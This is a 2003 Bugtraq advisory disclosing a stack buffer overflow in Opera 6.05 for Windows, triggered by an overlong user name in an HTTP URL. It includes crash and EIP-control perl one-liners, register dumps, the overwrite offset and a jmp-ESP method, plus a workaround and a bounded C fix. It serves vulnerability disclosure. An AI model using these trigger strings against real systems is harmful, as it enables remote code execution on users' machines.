[28837] in bugtraq


Opera Username Buffer Overflow Vulnerability

daemon@ATHENA.MIT.EDU (nesumin)
Mon Feb 10 12:47:47 2003

Date: Sun, 09 Feb 2003 16:47:46 +0900
From: nesumin <nesumin@softhome.net>
To: bugtraq@securityfocus.com
Message-Id: <20030209163838.73AB.NESUMIN@softhome.net>

Hello all.

We release here information about a vulnerability in Opera,
and we hope that the vendor fixes it immediately.

    ___________________________________________________

--------------------------------------------------------------
 Synopsis:    Opera Username Buffer Overflow Vulnerability
 Product:     Opera for Windows
 Version:     6.05 build1140 (and Opera7 beta2 build2577)
 Vendor:      Opera Software ASA (http://www.opera.com/)
 Risk:        High (execution of arbitrary binary code)
 Remote:      Yes
 Local:       Yes
 Discovered:  nesumin <nesumin@softhome.net>
 Reported:    2003-02-02
 Published:   2003-02-09
--------------------------------------------------------------

Product :

  Opera for Windows is a GUI-based web browser.
  It includes mail, news and IM clients.

  Opera Software ASA
  http://www.opera.com/


OverView :

  Opera 6.05 build 1140 (and Opera 7 beta2 build 2577) for Windows
  has a critical vulnerability.
  When Opera opens an HTTP URL that contains a long user name,
  a buffer overflow occurs on the stack.

  An attacker can trigger it through a link (anchor tag),
  a picture (image tag), a frame, a script, etc.
  The overflow overwrites the saved RET address on the stack,
  which makes it possible to execute arbitrary binary code.

  If an Opera user opens a malicious URL,
  they may suffer damage such as system destruction,
  virus infection, etc.


Tested on :

  Opera
    Opera6.05 build 1140
    Opera7 beta2 build 2577
    Opera7.00 build 2637
    Opera7.01 build 2651

    English edition and Japanese edition.

  Platform
    Windows98SE JP
    Windows2000 SP3 JP
    WindowsXP SP1 JP


Vulnerable (tested) :

  Opera6.05 build 1140
  Opera7 beta2 build 2577


Not vulnerable (tested) :

  Opera7.00 build 2637
  Opera7.01 build 2651


Vendor status :

  Reported to the vendor on 2003/02/02.
  However, we do not know the response or attitude of
  Opera Software ASA towards this vulnerability,
  because we have not received a formal reply from Opera Software ASA.


Solution :

  We propose the following temporary workaround until this vulnerability
  is fixed by the vendor.

  Delete the two "%s" from the string of resource number "21463"
  in the language file (*.lng).
  As a result, the user name and server name are no longer displayed
  in the URL warning dialog.


Details :

  When Opera opens an HTTP URL that contains a user name, it uses
  the format string of resource number "21463" in the language file
  to generate the string displayed in the "URL Warning Dialog".

  Because there is no length check on the user name, specifying a
  long user name overflows the local buffer on the stack.
  (The length of the whole URL is restricted.)

  The saved RET address is overwritten at about 2624 characters
  (16-bit wide); the exact offset depends on the string of "21463".
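  As an added illustration (not Opera's code and not the attached o6unexp.c), the formatting step described above with a bound on it; it also shows where the two "%s" slots named in the Solution section let the unchecked user name in. The format string, buffer size and host name are constructed stand-ins, not values from Opera.

```c
#include <stdio.h>
#include <wchar.h>

/* Constructed stand-in for the resource-21463 format string: two slots,
 * user name then server name. Opera's real string is not on the page. */
#define RES_21463 L"Username: %ls\nServer: %ls\nContinue?"

/* Hypothetical size of the local (stack) buffer the dialog text is built in. */
#define WARN_BUF_WCHARS 256

/* The pattern the advisory describes, for comparison only (never called):
 *     wchar_t buf[WARN_BUF_WCHARS];
 *     swprintf(buf, RES_21463, user, host);   // no bound, no length check
 * A user name longer than the buffer runs past it and over the saved
 * return address. build_warning() below is the bounded form. */

/* Bounded replacement: work out the rendered length up front, reject any
 * input that would not fit, then format with an explicit capacity.
 * Returns the number of wide characters written, or -1 when rejected. */
int build_warning(const wchar_t *user, const wchar_t *host,
                  wchar_t *out, size_t out_cap)
{
    size_t fixed = wcslen(RES_21463) - 2 * wcslen(L"%ls"); /* template minus slots */
    size_t need  = fixed + wcslen(user) + wcslen(host) + 1; /* + terminating NUL */
    if (out_cap == 0 || need > out_cap)
        return -1;
    int n = swprintf(out, out_cap, RES_21463, user, host);
    return (n < 0 || (size_t)n >= out_cap) ? -1 : n;
}

/* Feeds the advisory's 2624-character user name (constructed here, not the
 * attached exploit) through the bounded builder: it must be refused. */
int long_username_is_rejected(void)
{
    static wchar_t user[2625];
    wchar_t out[WARN_BUF_WCHARS];
    wmemset(user, L'A', 2624);
    user[2624] = L'\0';
    return build_warning(user, L"example.invalid", out, WARN_BUF_WCHARS) == -1;
}

int main(void)
{
    wchar_t out[WARN_BUF_WCHARS];
    printf("short name: %d wchars\n",
           build_warning(L"alice", L"example.invalid", out, WARN_BUF_WCHARS));
    printf("2624-char name rejected: %d\n", long_username_is_rejected());
    return 0;
}
```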


  [Opera6.05 build 1140, english language file]

  $ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"

  ---------------------------------------------------------------------
  Exception C0000005
  EAX=00410041   EBX=01B5F9BA   ECX=0012E254   EDX=01B60E58   ESI=01A8A940
  EDI=77DF6001   EBP=0012E278   ESP=0012CDD8   EIP=00423D68 FLAGS=00000216

  0012CDD8  00000110  00000001  005F2464  00200020  ........d$_. . .
  0012CDE8  00200020  00730055  00720065  0061006E   . .U.s.e.r.n.a.
  0012CDF8  0065006D  0020003A  00410041  00410041  m.e.:. .A.A.A.A.
  0012CE08  00410041  00410041  00410041  00410041  A.A.A.A.A.A.A.A.
    ....
  0012E268  00410041  00410041  00410041  00410041  A.A.A.A.A.A.A.A.
  0012E278 >00410041  00410041  007D0020  007C031E  A.A.A.A. .....|.
  0012E288  01A8A940  007D02D0  0012E2D8  00000000  @.....}...E.....
  ---------------------------------------------------------------------


  In the above case, an access violation occurs before EIP moves to
  the RET address. But EIP becomes movable by setting fake values,
  0x80000001 or other values, in the area that is referenced
  after the overwrite.


  $ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"

    "%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
    (with the "Encode all addresses with UTF-8" setting enabled.)

  ---------------------------------------------------------------------
  Exception C0000005
  EAX=00000001   EBX=005F2464   ECX=00010101   EDX=F03639D8    ESI=00000001
  EDI=00000110   EBP=80000001   ESP=0012E28C  *EIP=FEFEFEFE  FLAGS=00000202
  ---------------------------------------------------------------------


  The ESP register points about 0x10 bytes past the position
  of the RET address.

  Therefore, it is possible to execute arbitrary binary code
  by overwriting the RET address with the address of a "jmp ESP"
  instruction and putting the binary code after the area
  pointed to by the ESP register.

  In Opera 7.0 build 2637 or later, we could not confirm
  this vulnerability.


  [Note]

  The user name written into the buffer by this vulnerability
  is converted into 16-bit wide characters.

  When the "Encode all addresses with UTF-8" setting is enabled
  and the user name is specified in UTF-8 or a similar encoding,
  the exploit data can easily be placed on the stack.

  If that setting is disabled,
  it becomes very difficult.


Sample Code : (attached file)

  o6unexp.c

  This program is a generator that creates exploit HTML files.
  Test-compiled with Visual C++ 6.

  * This source code is only a sample for checking the vulnerability.
  * Whatever result is caused by this code is the user's
    responsibility.


Special thanks :

  :: Operash ::
  [ Unofficial Opera's Bug and Security information site for Japanese people ]
  
  imagine (Operash webmaster)
  melorin


Contacts, Etc :

  nesumin <nesumin@softhome.net>


  This information is provided without any guarantee of its contents.
  We may correct the contents of this information at any time.
  We take no responsibility for any damage caused by using
  this information.

    ___________________________________________________



--------------------------------------------------
nesumin <nesumin@softhome.net>

